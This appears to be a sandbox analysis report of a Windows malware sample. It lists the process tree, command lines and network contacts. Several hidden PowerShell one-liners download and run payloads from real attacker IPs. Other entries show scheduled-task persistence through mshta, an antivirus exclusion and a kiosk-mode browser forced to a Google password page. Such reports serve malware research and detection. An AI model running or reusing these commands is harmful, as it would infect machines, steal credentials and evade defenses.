PID 2772 wrote to memory of 2924 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 2924 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 2588 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE
PID 2924 wrote to memory of 2588 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE
PID 2924 wrote to memory of 2588 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE
PID 2924 wrote to memory of 2588 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE
PID 2588 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2588 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2588 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2588 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2108 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2108 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2108 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2108 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2400 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 2400 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 2400 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 2400 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 2108 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
PID 2108 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
PID 2108 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
PID 2108 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
PID 2240 wrote to memory of 600 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2240 wrote to memory of 600 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2240 wrote to memory of 600 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2240 wrote to memory of 600 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2108 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe
PID 2108 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe
PID 2108 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe
PID 2108 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe
PID 2072 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe C:\Windows\SysWOW64\cmd.exe
PID 2072 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe C:\Windows\SysWOW64\cmd.exe
PID 2072 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe C:\Windows\SysWOW64\cmd.exe
PID 2072 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe C:\Windows\SysWOW64\cmd.exe
PID 2072 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe C:\Windows\SysWOW64\mshta.exe
PID 2072 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe C:\Windows\SysWOW64\mshta.exe
PID 2072 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe C:\Windows\SysWOW64\mshta.exe
PID 2072 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe C:\Windows\SysWOW64\mshta.exe
PID 1896 wrote to memory of 3036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1896 wrote to memory of 3036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1896 wrote to memory of 3036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1896 wrote to memory of 3036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1900 wrote to memory of 1516 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1900 wrote to memory of 1516 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1900 wrote to memory of 1516 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1900 wrote to memory of 1516 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1516 wrote to memory of 2392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE
PID 1516 wrote to memory of 2392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE
PID 1516 wrote to memory of 2392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE
PID 1516 wrote to memory of 2392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe

"C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn zhMA3ma2QWa /tr "mshta C:\Users\Admin\AppData\Local\Temp\eFSASVJL1.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\eFSASVJL1.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn zhMA3ma2QWa /tr "mshta C:\Users\Admin\AppData\Local\Temp\eFSASVJL1.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE

"C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"

C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe

"C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn 8oFa0maGBGe /tr "mshta C:\Users\Admin\AppData\Local\Temp\Bjuo1Ytnk.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\Bjuo1Ytnk.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn 8oFa0maGBGe /tr "mshta C:\Users\Admin\AppData\Local\Temp\Bjuo1Ytnk.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE

"C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\system32\taskeng.exe

taskeng.exe {8387FC48-1B8B-4A2E-A46B-DAA0AB7AE7B3} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\ProgramData\sugkcx\gvnsf.exe

C:\ProgramData\sugkcx\gvnsf.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "f2QhvmaOIYD" /tr "mshta \"C:\Temp\GH8RmsOFg.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\GH8RmsOFg.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe

"C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe"

C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe

"C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe"

C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe

"C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1532 -s 508

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1688 -s 1028

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe

"C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe"

C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe

"C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe

"C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2836 -s 1200

C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe

"C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe"

C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe

"C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.0.1343690239\1625897888" -parentBuildID 20221007134813 -prefsHandle 1212 -prefMapHandle 1204 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1c58ad70-77ce-4714-a16d-718e2daf80da} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 1288 110b7858 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.1.694409263\743002394" -parentBuildID 20221007134813 -prefsHandle 1480 -prefMapHandle 1476 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4d366d0d-4de4-478b-ad16-c0a158ce176b} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 1492 e74258 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.2.755936859\1884948793" -childID 1 -isForBrowser -prefsHandle 2056 -prefMapHandle 2052 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d284488-94dc-43c2-8703-eef4d499d07a} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 2068 19ea9358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.3.668382452\2020364546" -childID 2 -isForBrowser -prefsHandle 2912 -prefMapHandle 2908 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {10ce6ca1-5ffc-4de3-ba77-71250d0d15d8} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 2924 e64858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.4.957323284\231409263" -childID 3 -isForBrowser -prefsHandle 3804 -prefMapHandle 3812 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba4ef1ef-4c74-45c0-aa97-ba1ccee776fd} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 3824 1fccb858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.5.972541004\640143421" -childID 4 -isForBrowser -prefsHandle 3948 -prefMapHandle 3952 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e0004a2-230c-4dfe-8201-712d705526be} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 3940 1fcf4858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.6.1844910257\749227326" -childID 5 -isForBrowser -prefsHandle 4068 -prefMapHandle 3796 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f44240c1-0e27-40ac-b4f5-3507ce3bf15a} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 4056 1fcf2458 tab

C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe

"C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe"

C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe"

C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7FE9.tmp\7FEA.tmp\7FEB.bat C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 1048

C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3420 -s 1204

C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3800 -s 504

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 1016

C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe"

C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 500

C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe

"C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_2212_133856897364813000\chromium.exe

C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\ipzvs8T3\Anubis.exe""

C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe"

Network

Country Destination Domain Proto
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
LU 45.59.120.8:80 45.59.120.8 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
NL 45.154.98.175:6969 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.64.1:443 exarthynature.run tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 8.8.8.8:53 croprojegies.run udp
US 104.21.64.1:443 croprojegies.run tcp
RU 45.93.20.28:80 45.93.20.28 tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 getpocket.cdn.mozilla.net udp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
GB 142.250.187.206:443 youtube.com udp
US 8.8.8.8:53 www.youtube.com udp
N/A 127.0.0.1:49650 tcp
N/A 127.0.0.1:49656 tcp
GB 142.250.187.238:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 142.250.187.238:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
GB 216.58.213.14:443 consent.youtube.com udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 towerbingobongoboom.com udp
US 213.209.150.137:4000 towerbingobongoboom.com tcp
US 213.209.150.137:4266 towerbingobongoboom.com tcp
US 8.8.8.8:53 joyfulhezart.tech udp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 8.8.8.8:53 codxefusion.top udp
US 172.67.212.102:443 codxefusion.top tcp
US 8.8.8.8:53 biochextryhub.bet udp
US 172.67.192.128:443 biochextryhub.bet tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com udp
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 moderzysics.top udp
US 172.67.189.66:443 moderzysics.top tcp
RU 176.113.115.7:80 176.113.115.7 tcp
DE 5.75.210.149:443 tcp
GB 216.58.213.14:443 consent.youtube.com udp
DE 5.75.210.149:443 tcp
